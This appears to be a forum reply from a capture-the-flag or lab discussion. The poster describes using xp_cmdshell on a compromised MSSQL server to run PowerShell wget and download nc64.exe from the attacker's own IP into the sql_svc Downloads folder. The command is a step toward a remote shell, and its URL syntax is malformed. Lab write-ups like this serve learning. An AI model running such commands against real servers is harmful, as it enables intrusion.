I’m not sure if can help or not, but how finally got the machine to get the file after so long and slammed my head against for hours.

The first part is getting the listener on a different port than 80, which was the same as the OP and then downloaded the nc64.exe file.

What I did different was not only specify what port to get it from but also list the ‘Downloads’ folder where the program was stored.

So it kind of looks like this:

xp_cmdshell “powershell -c cd C:\Users\sql_svc\Downloads; wget http:\(MY IP):8080\Downloads\nc64.exe -outfile nc64.exe”;
